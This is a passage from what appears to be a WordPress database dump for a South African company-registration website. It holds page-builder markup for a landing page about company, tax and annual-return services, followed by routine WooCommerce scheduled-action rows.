custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 16:18:10','2019-08-15 14:18:10','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32830,0,'2019-08-15 16:02:23','2019-08-15 16:02:23','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55844de3f164.22794375-VQT93wpdWq8l6b90OjUR9BOGl9jnPUvk','','','2019-08-15 18:11:57','2019-08-15 16:11:57','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32830',0,'scheduled-action','',3),(32831,0,'2019-08-15 16:02:23','2019-08-15 16:02:23','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55844e0d6400.92735648-iI3ELhFJFOBwAaIxI2fgimVZRaN85AOu','','','2019-08-15 18:11:58','2019-08-15 16:11:58','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32831',0,'scheduled-action','',3),(32832,0,'2019-08-15 17:11:57','2019-08-15 17:11:57','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55999a5732e4.88461281-Z3SCCXd3mF3NA1OEedkmGXad6SEKcjN5','','','2019-08-15 19:42:50','2019-08-15 17:42:50','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32832',0,'scheduled-action','',3),(32833,0,'2019-08-15 17:11:58','2019-08-15 17:11:58','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55999a735778.24888526-RjGUfjun7PY61Gn80FCWXqgJppKOvJkx','','','2019-08-15 19:42:50','2019-08-15 17:42:50','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32833',0,'scheduled-action','',3),(32834,0,'2019-08-15 18:42:50','2019-08-15 18:42:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55aad3b6a802.60659136-C7br96WO3SKnWwOosKo4sx27BvOExDS8','','','2019-08-15 20:56:19','2019-08-15 18:56:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32834',0,'scheduled-action','',3),(32835,0,'2019-08-15 18:42:50','2019-08-15 18:42:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55aad3c76621.51595311-4CyflL8uNP0zvKIuyKxG5VV03lUbhVQB','','','2019-08-15 20:56:19','2019-08-15 18:56:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32835',0,'scheduled-action','',3),(32836,0,'2019-08-15 19:56:19','2019-08-15 19:56:19','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55bb47582422.12052263-VYxOTp0DrBOaatCaLU1lTW6jh7KT1Ajb','','','2019-08-15 22:06:31','2019-08-15 20:06:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32836',0,'scheduled-action','',3),(32837,0,'2019-08-15 19:56:19','2019-08-15 19:56:19','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55bb476768c0.95003535-4H8UzF2dooUcVGau7YMNKLyrLoGSqIa5','','','2019-08-15 22:06:31','2019-08-15 20:06:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32837',0,'scheduled-action','',3),(32838,0,'2019-08-15 21:06:31','2019-08-15 21:06:31','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55ccfb631359.64164792-qBmgly0pn35mexv3M3HwN25rGJLgzdO6','','','2019-08-15 23:22:03','2019-08-15 21:22:03','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32838',0,'scheduled-action','',3),(32839,0,'2019-08-15 21:06:31','2019-08-15 21:06:31','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55ccfb88f588.95205945-zITpzILQoqLltApbMOCFiaBNi7D8Bzn7','','','2019-08-15 23:22:03','2019-08-15 21:22:03','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32839',0,'scheduled-action','',3),(32840,0,'2019-08-15 22:22:03','2019-08-15 22:22:03','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55de5601a693.33427580-cBewNnkqWYLuA4D7lTcqmohhLvY75PzI','','','2019-08-16 00:36:06','2019-08-15 22:36:06','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32840',0,'scheduled-action','',3),(32841,0,'2019-08-15 22:22:03','2019-08-15 22:22:03','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55de56108be0.25630538-7r8fjkAdYEvDgcgUfUi9DfqZWVCNBiSY','','','2019-08-16 00:36:06','2019-08-15 22:36:06','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32841',0,'scheduled-action','',3),(32842,0,'2019-08-15 23:36:06','2019-08-15 23:36:06','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55ee309ff1e7.33325137-UppvUUiKNMZv49hnUIS5zrvalMTAuSGi','','','2019-08-16 01:43:44','2019-08-15 23:43:44','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32842',0,'scheduled-action','',3),(32843,0,'2019-08-15 23:36:06','2019-08-15 23:36:06','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d55ee30ae71b1.89671246-Ux5Vfd8f34uy1dKBkRm8WPnVwpfe3E4h','','','2019-08-16 01:43:44','2019-08-15 23:43:44','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32843',0,'scheduled-action','',3),(32844,0,'2019-08-16 00:43:44','2019-08-16 00:43:44','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d56027b0b8a22.22051519-hvYFF3zi3QYShnPZdw93dpt7qrjZhSBQ','','','2019-08-16 03:10:19','2019-08-16 01:10:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32844',0,'scheduled-action','',3),(32845,0,'2019-08-16 00:43:44','2019-08-16 00:43:44','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d56027b248d06.79559971-fXXxApHOCWwtRtVxI4BqqwC0tqBpNKlh','','','2019-08-16 03:10:19','2019-08-16 01:10:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32845',0,'scheduled-action','',3),(32846,0,'2019-08-16 02:10:19','2019-08-16 02:10:19','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d561225bfab36.43874084-0zpFeqYw1pJDAffjZZdfyfBXfLqgwq4T','','','2019-08-16 04:17:09','2019-08-16 02:17:09','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32846',0,'scheduled-action','',3),(32847,0,'2019-08-16 02:10:19','2019-08-16 02:10:19','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d561225d8a3d4.96350063-8tQUzWp92IxUvo8TBGe8YsOyJ4UklX0d','','','2019-08-16 04:17:09','2019-08-16 02:17:09','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32847',0,'scheduled-action','',3),(32848,0,'2019-08-16 03:17:09','2019-08-16 03:17:09','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5621c921edc9.74130554-yC6gvfc58jcsauEkjxG4Ten0CL2PqkoD','','','2019-08-16 05:23:53','2019-08-16 03:23:53','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32848',0,'scheduled-action','',3),(32849,0,'2019-08-16 03:17:09','2019-08-16 03:17:09','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5621c941fc00.84473328-BOgdN6dsRWWzropoxupiyFk2RjaDUHkM','','','2019-08-16 05:23:53','2019-08-16 03:23:53','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32849',0,'scheduled-action','',3),(32850,0,'2019-08-16 04:23:53','2019-08-16 04:23:53','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5631eca883a3.44081635-SI6W6LxbD7FJ3EJTVW8iL4aaoyvC1QSH','','','2019-08-16 06:32:44','2019-08-16 04:32:44','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32850',0,'scheduled-action','',3),(32851,0,'2019-08-16 04:23:53','2019-08-16 04:23:53','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5631ecc1fec1.84591590-G8dKcSYtqJ9PwgvcUtCK37ltOZLCHBIp','','','2019-08-16 06:32:44','2019-08-16 04:32:44','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32851',0,'scheduled-action','',3),(32852,0,'2019-08-16 05:32:44','2019-08-16 05:32:44','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d56430e718b35.07251089-duEn3uHpcHBU6vw7SGvbWp2gClGSPYsB','','','2019-08-16 07:45:50','2019-08-16 05:45:50','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32852',0,'scheduled-action','',3),(32853,0,'2019-08-16 05:32:44','2019-08-16 05:32:44','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d56430e8591a7.55515864-J204OpnQkAoKBtGyF3crmZ41xUYBzNtG','','','2019-08-16 07:45:50','2019-08-16 05:45:50','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32853',0,'scheduled-action','',3),(32854,0,'2019-08-16 06:45:50','2019-08-16 06:45:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5651471d38f9.23641623-4fhjnSWMshXw4FRPTNICoxan7ZfnDZU0','','','2019-08-16 08:46:31','2019-08-16 06:46:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32854',0,'scheduled-action','',3),(32855,0,'2019-08-16 06:45:50','2019-08-16 06:45:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d565147344594.87575938-kGkZ3EWOmgjtTlHHjkMAUcAzONikoS6y','','','2019-08-16 08:46:31','2019-08-16 06:46:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32855',0,'scheduled-action','',3),(32856,0,'2019-08-16 07:46:31','2019-08-16 07:46:31','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d565f8d0dd9e1.97037289-UigGUURbrT0TuVApnGOdSmog2hGiWG76','','','2019-08-16 09:47:25','2019-08-16 07:47:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32856',0,'scheduled-action','',3),(32857,0,'2019-08-16 07:46:31','2019-08-16 07:46:31','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d565f8d2f0c86.07324623-7J1ZGcTzfVaMQ9EydPIH5I9yaROEwvsX','','','2019-08-16 09:47:25','2019-08-16 07:47:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32857',0,'scheduled-action','',3),(32864,3,'2019-08-19 09:19:00','2019-08-19 07:19:00','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" 